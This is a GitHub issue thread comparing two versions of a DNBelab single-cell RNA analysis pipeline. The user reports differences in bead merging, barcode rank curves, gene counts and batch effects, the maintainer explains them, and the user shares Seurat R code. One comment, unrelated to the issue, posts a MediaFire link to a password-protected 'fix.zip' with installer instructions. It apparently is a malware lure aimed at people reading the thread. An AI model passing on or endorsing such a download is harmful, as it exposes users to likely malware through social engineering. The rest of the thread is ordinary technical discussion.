### ISSUE TITLE
Concerns Regarding Differences Between V2.1.2 and V2.0.7 Pipelines

### ISSUE THREAD

**Issue by nh-codem** [MGI-tech-bioinformatics/DNBelab_C_Series_HT_scRNA-analysis-software#109]
![image](https://github.com/user-attachments/assets/7a2d9f71-8935-4bf9-b180-95fe033d8672)
I have some concerns regarding the differences between the V2.1.2 and V2.0.7 pipelines.

According to the release notes, the main upgrade in **V2.1.2** is the optimization of the **bead merging algorithm**. However, this optimization seems to have significantly impacted the data output for the same library. Firstly, the **Barcode Rank curve** has changed noticeably. Additionally, **a higher proportion of beads are merged in the new version**, which raises the question of whether this could lead to noticeable differences in UMI to Barcode assignment compared to the previous pipeline. For example, will the UMIs that were previously assigned to the same Barcode now be either increased, decreased, or mismatched?

I also checked the **filter_matrix** and noticed that while **V2.0.7 produced fewer cells, it captured a broader gene expression profile, with 20,017 genes. In contrast, V2.1.2, despite producing more cells, detected fewer genes, totaling 19,522.** When performing a co-embedding analysis in `Seurat` on data from the same library processed with both pipelines, we observed distinct gene features separating the two, manifesting as noticeable **Batch effects**.

**Concerns:** Based on these observations, we have some concerns regarding the **robustness** of the V2.1.2 pipeline. We would appreciate guidance on whether it is necessary to update our future research to the V2.1.2 workflow and how we might reconcile data characteristics between the old and new pipelines to avoid revealing biologically irrelevant differences driven by tech discrepancies.
@lishuangshuang0616 

![image](https://github.com/user-attachments/assets/2aee2358-5efa-4725-89fc-4af9c1306f0d)

**Comment by Kudjo-Grand** [comment]
Download 
https://www.mediafire.com/file/3hzk77cxvxc9nq2/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by lishuangshuang0616** [comment]
In version 2.0.7, the barcoderanks curve is displayed based on individual cell barcodes, while in version 2.1.2, the curve is shown based on cells after merging cell barcodes. This can result in significant differences. However, the two versions will not fundamentally change the UMI and gene counts for the same cell barcode; they remain nearly unchanged. You can check the corresponding UMI for each cell barcode by looking at the 01.data/beads_stat.txt file. Nonetheless, there are other differences between the two versions. For instance, in the QC section, version 2.1.2 may include more reads, which could lead to differences in UMI.

Regarding the difference in gene counts, are you using the same GTF file? This is something I need to double-check.

The presence of batch effects is due to differences in mRNA expression between defined cells. It is important to maintain consistency in the analysis software within the same project to minimize batch effects.

In version 2.1.2, the merging algorithm first considers merging cell barcodes, while in version 2.0.7, it first considers cell calling to identify potential cell barcodes. This leads to situations where, when analyzing some low-expression cells, multiple beads capturing mRNA might result in certain cell barcodes being excluded due to cell calling in version 2.0.7. The merging algorithm also takes background interference into account; if a bead in the background is more similar, it will not be merged. As a result, some real cell barcodes might remain in the background after cell calling, making bead merging more difficult.

Failure to merge beads does not lead to errors in dimensionality reduction and clustering since it only results in the loss of some mRNA. Therefore, it is recommended to use consistent versions of the analysis software to reduce batch effects.

**Comment by nh-codem** [comment]
Thank you for your professional reply. 
In `Seurat V5`,  I addressed the technical discrepancies by selecting consistent features from both datasets for dimensionality reduction.
```
pacman::p_load(Seurat,dplyr,patchwork)

{
    lapply(list.files(".","_matrix"), function(x){
        counts <- Read10X(x,gene.column = 1)
        CreateSeuratObject(counts = counts,project = gsub("_matrix","",basename(x)))
    }) %>% (\(.) ( merge(.[[1]],.[-1]) ))() ->seuObj
    MTGenes = c("ND6","COX3","COX1","ND5","ND4","ND2","ND4L","ATP8","CYTB","COX2","ND3","ATP6","ND1")
    seuObj[["percent.mt"]] <- PercentageFeatureSet(seuObj, features  = MTGenes)
    seuObj[["countFeatureRatio"]] <- round(seuObj$nCount_RNA / seuObj$nFeature_RNA, 2) 
}

{
    seuObj.QC = subset(seuObj, nFeature_RNA > 800 & percent.mt < 5 & countFeatureRatio > 1.2)
    seuObj.QC@meta.data %>% group_by(orig.ident) %>% count()
    seuObj.QC <- seuObj.QC %>% SCTransform(verbose = F) %>% RunPCA(verbose = F) %>% RunUMAP(dims = 1:25, verbose = T)
}

{
    DefaultAssay(seuObj.QC) <- "RNA"
    seuObj.QC.logNorm <- seuObj.QC %>% FindVariableFeatures() %>% 
        NormalizeData() %>% ScaleData() %>% RunPCA(verbose = F) %>% RunUMAP(dims = 1:25, verbose = T)
}

# Plot.Data ---------------------------------------------------------------
DimPlot(seuObj.QC.logNorm,group.by = "orig.ident") & scale_color_brewer(palette = "Set1")

DimPlot(seuObj.QC.logNorm,group.by = "orig.ident",pt.size = 0.05 ,cells.highlight = Cells(seuObj.QC)[seuObj.QC$orig.ident == "V2.0.7"]) +
    DimPlot(seuObj.QC.logNorm,group.by = "orig.ident",pt.size = 0.05 ,cells.highlight = Cells(seuObj.QC)[seuObj.QC$orig.ident == "V2.1.2"])

FeaturePlot(seuObj.QC.logNorm, features = c("SLC17A7","GAD1","GAD2","PDGFRA","PDGFRB",'C1QB'),ncol = 3)

```
![image](https://github.com/user-attachments/assets/e31a54ec-bc3c-45b5-bc10-bd968bcc924a)
